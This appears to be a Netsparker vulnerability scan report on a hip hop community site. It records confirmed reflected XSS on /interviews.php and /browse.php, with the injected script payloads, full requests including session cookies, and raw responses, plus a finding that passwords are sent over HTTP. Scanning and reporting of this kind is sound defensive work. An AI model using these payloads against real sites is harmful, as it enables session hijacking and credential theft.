Release Date: July 27, 2010

Fat Joe’s 10th LP The Darkside Vol 1 hits stores July 27th of this year. Pushed back about a month or so was a smart move by the don as many of his fans are looking forward... <a href='/interview.php?id=18399' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18036'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/06/styles-front-cover.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18036' style='font-weight:bold;color:yellow;'>Styles P</a><br><br>
Styles P
Mix tape: The Ghost Dub-Dime
Release Date: OUT NOW!!
Novel &amp; Soundtrack: Invincible
Release Date: OUT NOW!!
Just three months ago Styles released a pretty impressive mix tape with DJ Green Lantern The Green Ghost Project and main... <a href='/interview.php?id=18036' style='font-weight:bold;color:white;'>Read more</a></td></tr> </td>
<td class="table2right">&nbsp;</td>
</tr>

</table></td></tr></table><p><span style='padding:15px;background-color:#111111;'>1, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=2">2</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=3">3</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=4">4</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=5">5</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=6">6</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=7">7</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=8">8</a>, <a style='color:yellow;' href="/interviews.php?sextt='"--></style></script><script>netsparker(0x000079)</script>&page=9">9</a> ... <a href="interviews.php?page=2&sextt='"--></style></script><script>netsparker(0x000079)</script>">Next</a> </span></p><p>&nbsp;</p> </div>
</div>
</div>
</div> </div><!-- RIGHT SIDEBAR --> <div id="content-right-wrapper"> <div id="content-right"> <div id="block-login" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">THH Login </h2> <div class="mod-right"> <!-- LOGIN --> <div id="login-wrap"> <div class="login-block"> <a name="login"></a> <form id="login" action="http://www.thatshiphop.com/index.php?page=login" method="post"> <input type="hidden" name="action" value="authenticate" /> <input type="hidden" name="login_authenticate" value="LOGIN"/> <div id="login-elements"> <p><label for="user-name">User Name</label><input type="text" name="login_username" id="user-name"></p> <p style="clear:left;"><label for="password">Password</label><input type="password" name="login_password" id="password"></p> <p style="clear:left;" class="forgot-pass">forgot password [ <a href="/index.php?page=forgot_password">Click Here</a>]</p> </div> <p class="login-icons"><a class="icon-fb" href="javascript:void(0);" onmouseover="document.status='Login with Facebook';" onmouseout="document.status='';" onclick="location.href='https://www.facebook.com/login.php?api_key=158941227471070&cancel_url=http%3A%2F%2Fwww.thatshiphop.com%2Finterviews.php%3Fnsextt%3D%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000079%2529%253C%252Fscript%253E&display=page&fbconnect=1&next=http%3A%2F%2Fwww.thatshiphop.com%2Finterviews.php%3Fnsextt%3D%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000079%2529%253C%252Fscript%253E&return_session=1&session_version=3&v=1.0';">facebook</a> <a class="icon-twitter" href="javascript:void(0);" onmouseover="document.status='Login with Twitter';" onmouseout="document.status='';" onclick="location.href='/twitteroauth/redirect.php'">twitter</a> <input type="submit" id=&qu..
- /interviews.php

/interviews.php CONFIRMED

http://www.thatshiphop.com/interviews.php?'"--></style></script><script>alert(0x0000A6)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0000A6)</script>

Request

GET /interviews.php?'"--></style></script><script>netsparker(0x0000A6)</script> HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:11:11 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community">
<meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!">
<meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" />
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
<script src="js/jquery.tools.min.js" type="text/javascript"></script>
<script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script>
<script src="js/home.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="css/style.css">
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]-->
<title>ThatsHipHop.com - Interviews</title>
</head>

<body>
<div id="page">
<div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div>
<div id="main-wrapper">
<!-- LEFT SIDEBAR -->

<div id="content-left-wrapper">
<div id="content-left">
<div class="mod-left-wrap">
<div class="mod-left-inner">
<h2 class="title">ThatsHiphop.com Interviews</h2>
<div class="mod-left">
<tr>
<td class="table2left">&nbsp; </td>
<td class="table2bg" valign="top">
<table width='530' cellspacing='10' cellpadding='10'><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20962'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/03/large_amounts_the_best_of_large_amounts-front-large.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20962' style='font-weight:bold;color:yellow;'>Large Amount</a><br><br>
LARGE AMOUNT
“THE BOY WITH A BILLION BARS”
"The BOY WITH A BILLION BARS”, in which this unique title was also naturally recognized by his major influences of well-known rappers hailing from the streets of Yonkers, which include platinum reco... <a href='/interview.php?id=20962' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20742'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/01/grouphome.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20742' style='font-weight:bold;color:yellow;'>Group Home</a><br><br>
GROUP HOME
RSRadio: So group home itís been a few years since you have released an official album what made you decide that now was the right time?
GH: We have been in motion working on this project for a period of time. It is a passion for the music... <a href='/interview.php?id=20742' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20740'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/01/marsha_ambrosius-2.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20740' style='font-weight:bold;color:yellow;'>Marsha Ambrosius</a><br><br>'
Marsha Ambrosius
ALBUM: Late Nights &amp; Early Mornings
Release Date: January 4, 2011
SINGLE: Hope She Cheats on You (With a Basketball Player)
Download ONLINE NOW
Http://www.Rcamusicgroup.com/music/marsha-ambrosius/hope-she-cheats-you-basketb... <a href='/interview.php?id=20740' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20738'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/01/cyhi-da-prince-main-pic.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20738' style='font-weight:bold;color:yellow;'>Cyhi Da Prince</a><br><br>
CyHi Da Prince
Mixtape: Royal Flush
IN STORES/ONLINE NOW!!!
Konvict Muzikís debut artist, charismatic Southern rapper Cyhi da Prynce, began his industry ascendance as a member of Stone Mountain, Georgiaís infamous rap group, Hoodlum, a short-live... <a href='/interview.php?id=20738' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=19450'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/09/bluecollarcoverbig-put-above-intrview.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=19450' style='font-weight:bold;color:yellow;'>Thadd</a><br><br>
THADD
Mixtape: Blue Collar Code
Release Date: OUT NOW!!
Up Next: Blue Collar Code 1.5
Release date: TBA 4th quarter 2010
Born in South Carolina and reared in Virginia, Thaddeus Williams brings a rare palette of business acumen to the industry... <a href='/interview.php?id=19450' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=19072'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/08/romey_0927hires.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=19072' style='font-weight:bold;color:yellow;'>Romey</a><br><br>

ALBUM: I Am King
RELEASE DATE: Sept 2010

(This Album will be Available Online)

It’s hard to stand out in a city full of stars. But instead of being intimidated by all the hype surrounding the Windy City’s overnight celebrities, Romey is... <a href='/interview.php?id=19072' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18882'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/08/sarahgreen.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18882' style='font-weight:bold;color:yellow;'>Sarah Green</a><br><br>
Sarah Green
Mixtape: TBA
Release Date: TBA
Chicago is home to some of the finest talent in the music industry...Sarah Green is no exception. Sarah recognized her gift as a vocalist at the tender age of 6 when she started singing in her family c... <a href='/interview.php?id=18882' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18880'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/08/bigboi-banner-pic.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18880' style='font-weight:bold;color:yellow;'>Big Boi</a><br><br>
Big Boi
Album: Sir Lucious Left Foot: The Son of Chico Dusty
Release Date: In Stores NOW!
Antwan “Big Boi” Patton is a man of many hats but best known as half of Outkast. For a while their were rumors and discussions of a break up between ... <a href='/interview.php?id=18880' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18399'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/07/fat-joe-the-darkside-album-cover-above-interview.thumbnail.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18399' style='font-weight:bold;color:yellow;'>Fat Joe</a><br><br>

Fat Joe

Album: The Darkside Vol. 1

Release Date: July 27, 2010

Fat Joe’s 10th LP The Darkside Vol 1 hits stores July 27th of this year. Pushed back about a month or so was a smart move by the don as many of his fans are looking forward... <a href='/interview.php?id=18399' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18036'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/06/styles-front-cover.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18036' style='font-weight:bold;color:yellow;'>Styles P</a><br><br>
Styles P
Mix tape: The Ghost Dub-Dime
Release Date: OUT NOW!!
Novel &amp; Soundtrack: Invincible
Release Date: OUT NOW!!
Just three months ago Styles released a pretty impressive mix tape with DJ Green Lantern The Green Ghost Project and main... <a href='/interview.php?id=18036' style='font-weight:bold;color:white;'>Read more</a></td></tr> </td>
<td class="table2right">&nbsp;</td>
</tr>

</table></td></tr></table><p><span style='padding:15px;background-color:#111111;'>1, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=2">2</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=3">3</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=4">4</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=5">5</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=6">6</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=7">7</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=8">8</a>, <a style='color:yellow;' href="/interviews.php?"--></style></script><script>netsparker(0x0000A6)</script>=&page=9">9</a> ... <a href="interviews.php?page=2&"--></style></script><script>netsparker(0x0000A6)</script>=">Next</a> </span></p><p>&nbsp;</p> </div>
</div>
</div>
</div> </div><!-- RIGHT SIDEBAR --> <div id="content-right-wrapper"> <div id="content-right"> <div id="block-login" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">THH Login </h2> <div class="mod-right"> <!-- LOGIN --> <div id="login-wrap"> <div class="login-block"> <a name="login"></a> <form id="login" action="http://www.thatshiphop.com/index.php?page=login" method="post"> <input type="hidden" name="action" value="authenticate" /> <input type="hidden" name="login_authenticate" value="LOGIN"/> <div id="login-elements"> <p><label for="user-name">User Name</label><input type="text" name="login_username" id="user-name"></p> <p style="clear:left;"><label for="password">Password</label><input type="password" name="login_password" id="password"></p> <p style="clear:left;" class="forgot-pass">forgot password [ <a href="/index.php?page=forgot_password">Click Here</a>]</p> </div> <p class="login-icons"><a class="icon-fb" href="javascript:void(0);" onmouseover="document.status='Login with Facebook';" onmouseout="document.status='';" onclick="location.href='https://www.facebook.com/login.php?api_key=158941227471070&cancel_url=http%3A%2F%2Fwww.thatshiphop.com%2Finterviews.php%3F%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000A6%2529%253C%252Fscript%253E%3D&display=page&fbconnect=1&next=http%3A%2F%2Fwww.thatshiphop.com%2Finterviews.php%3F%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000A6%2529%253C%252Fscript%253E%3D&return_session=1&session_version=3&v=1.0';">facebook</a> <a class="icon-twitter" href="javascript:void(0);" onmouseover="document.status='Login with Twitter';" onmouseout="document.status='';" onclick="location.href='/twitteroauth/redirect.php'">twitter</a> <input type="submit" id="submit" class="button" value=""> ..
- /browse.php

/browse.php CONFIRMED

http://www.thatshiphop.com/browse.php?type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter Type Value
type GET '"--></style></script><script>alert(0x00017A)</script>

Request

GET /browse.php?type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017A)%3C/script%3E HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:11:32 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community">
<meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!">
<meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" />
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
<script src="js/jquery.tools.min.js" type="text/javascript"></script>
<script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script>
<script src="js/home.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="css/style.css">
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]-->
<title>ThatsHipHop.com - '"--></style></script><script>netsparker(0x00017A)</script> - Page </title>
</head>

<body>
<div id="page">
<div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div>
<div id="main-wrapper">
<!-- LEFT SIDEBAR -->

<div id="content-left-wrapper">
<div id="content-left">
<div class="mod-left-wrap">
<div class="mod-left-inner">
<h2 class="title">Browsing '"--></style></script><script>netsparker(0x00017A)</script> &nbsp; Page 1 &nbsp; <a style="color:yellow;" href="browse.php?type='"--></style></script><script>netsparker(0x00017A)</script>&page=2">next</a></h2>
<div class="mod-left">
<table cellspacing="0" cellpadding="10" width="100%">
</table>
<p>&nbsp;</p><p align="center" style="font-weight:bold;"> <a style="color:yellow;" href="browse.php?type='"--></style></script><script>netsparker(0x00017A)</script>&page=2">next</a></p>
</div>
</div>
</div>
</div> </div><!-- RIGHT SIDEBAR --> <div id="content-right-wrapper"> <div id="content-right"> <div id="block-login" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">THH Login </h2> <div class="mod-right"> <!-- LOGIN --> <div id="login-wrap"> <div class="login-block"> <a name="login"></a> <form id="login" action="http://www.thatshiphop.com/index.php?page=login" method="post"> <input type="hidden" name="action" value="authenticate" /> <input type="hidden" name="login_authenticate" value="LOGIN"/> <div id="login-elements"> <p><label for="user-name">User Name</label><input type="text" name="login_username" id="user-name"></p> <p style="clear:left;"><label for="password">Password</label><input type="password" name="login_password" id="password"></p> <p style="clear:left;" class="forgot-pass">forgot password [ <a href="/index.php?page=forgot_password">Click Here</a>]</p> </div> <p class="login-icons"><a class="icon-fb" href="javascript:void(0);" onmouseover="document.status='Login with Facebook';" onmouseout="document.status='';" onclick="location.href='https://www.facebook.com/login.php?api_key=158941227471070&cancel_url=http%3A%2F%2Fwww.thatshiphop.com%2Fbrowse.php%3Ftype%3D%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00017A%2529%253C%252Fscript%253E&display=page&fbconnect=1&next=http%3A%2F%2Fwww.thatshiphop.com%2Fbrowse.php%3Ftype%3D%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00017A%2529%253C%252Fscript%253E&return_session=1&session_version=3&v=1.0';">facebook</a> <a class="icon-twitter" href="javascript:void(0);" onmouseover="document.status='Login with Twitter';" onmouseout="document.status='';" onclick="location.href='/twitteroauth/redirect.php'">twitter</a> <input type="submit" id="submit" class="button" value=""> <a class="icon-cprofile" href="#" onmouseover="window.status='Login with Twitter';" onmouseout="window.status='';" onclick="location.href='/index.php?page=register'">register</a></p> </form> </div><!-- LOGIN END --> </div> </div> </div> <div id="adblock-side-right" class="adblock"> <script type="text/javascript"><!-- google_ad_client = "ca-pub-9643032735294668"; /* Large Rectangle */ google_ad_slot = "2809290749"; google_ad_width = 360; google_ad_height = 240; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </div> <div id="block-interview" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">Interviews</h2> <div class="mod-right"> <div class="content"> <img src="http://www.thatshiphop.com/pthumbs/4/91/91/2011/03/large_amounts_the_best_of_large_amounts-front-large.jpg" width="91" height="91" border="0" alt="" align="left" /> <h3>Large Amount</h3> <p>
LARGE AMOUNT
“THE BOY WITH A BILLION BARS”
"The BOY WITH A BILLION BARS”, in which this unique title was also natura<br> <a style="color:yellow;" href="/interview.php?id=20962">Read More ></a> </p> </div> <div class="content"> <img src="http://www.thatshiphop.com/pthumbs/4/91/91/2011/01/grouphome.jpg" width="91" height="91" border="0" alt="" align="left" /> <h3>Group Home</h3> <p>
GROUP HOME
RSRadio: So group home itís been a few years since you have released an official album what made you decide that <br> <a style="color:yellow;" href="/interview.php?id=20742">Read More ></a> </p> </div> </div> </div> </div> </div> <!-- <div id="block-interview" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">Feature Model</h2> <div class="mod-right"> mod </div> </div> </div> --> </div> </div><br clear="all"> <!-- FOOTER --> <div id="footer-wrapper"> <div id="footer"> <div id="footer-nav-wrapper"> <div id="footer-nav"> <ul class="menu"> <li class="first"><a href="/index.php?page=home">Home</a></li> <li><a href="/news.php">News</a></li> <li><a href="/browse.php?type=audio">Music</a></li> <li><a href="/browse.php?type=video">Video</a></li> <li><a href="/live/">Chat</a></li> <li><a href="/index.php?page=artists_home">Artist</a></li> <li><a href="/display_photos.php">Pics</a></li> <li><a href="/interviews.php">Interviews</a></li> <li><a href="/models.php">Models R US</a></li> <li><a href="/privacy.php">Privacy Policy</a></li> <li class="last"><a href="/rss.php">RSS Feeds</a></li> </ul> </div> </div> <div id="footer-ad-block" class="adblock"> <div id="adblock-left" class="adblock"> <script type="text/javascript"><!-- google_ad_client = "ca-pub-9643032735294668"; /* 728x90, Generic All Pages */ google_ad_slot = "1105967903"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </div> <div id="adblock-right" class="adblock"> <img src="images/adblock_220x90_sneak.jpg" width="220" height="90" border="0" alt=""> </div> </div> <div id="copyright"> ThatsHipHop.com &copy; 2010 All Rights Reserved. Webmaster: Joe Burnett. &nbsp; Contact: <a href="mailto:info@thatshiphop.com">info@thatshiphop.com</a> </div> </div> </div> </div> </div><div id="fb-root"></div>
<script>
window.fbAsyncInit = function() {
FB.init({
appId : '158941227471070',
session : null, // don't refetch the session when PHP already has it
status : true, // check login status
cookie : true, // enable cookies to allow the server to access the session
xfbml : true // parse XFBML
});

// whenever the user logs in, we refresh the page
FB.Event.subscribe('auth.login', function() {
window.location.reload();
});
};

(function() {
var e = document.createElement('script');
e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
e.async = true;
document.getElementById('fb-root').appendChild(e);
}());
</script>
</body></html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /

/ CONFIRMED

http://www.thatshiphop.com/

Form target action

mshtml.HTMLInputElementClass

Request

GET / HTTP/1.1
Referer: http://www.thatshiphop.com/blog.php'
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:09:31 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; path=/; domain=thatshiphop.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community"> <meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!"> <meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" /> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6"> <link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10"> <link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26"> <link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33"> <script src="js/jquery.min.js" type="text/javascript"></script> <script src="js/jquery.tools.min.js" type="text/javascript"></script> <script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script> <script src="js/jquery.mousewheel.min.js" type="text/javascript"></script> <script src="js/jquery.jscrollpane.min.js" type="text/javascript"></script> <script src="js/home.js" type="text/javascript"></script> <link rel="stylesheet" type="text/css" href="css/style.css"> <link rel="stylesheet" type="text/css" href="css/jscrollpane.css"> <!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]--> <title>ThatsHiphop.com</title></head><body> <div id="page"> <div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
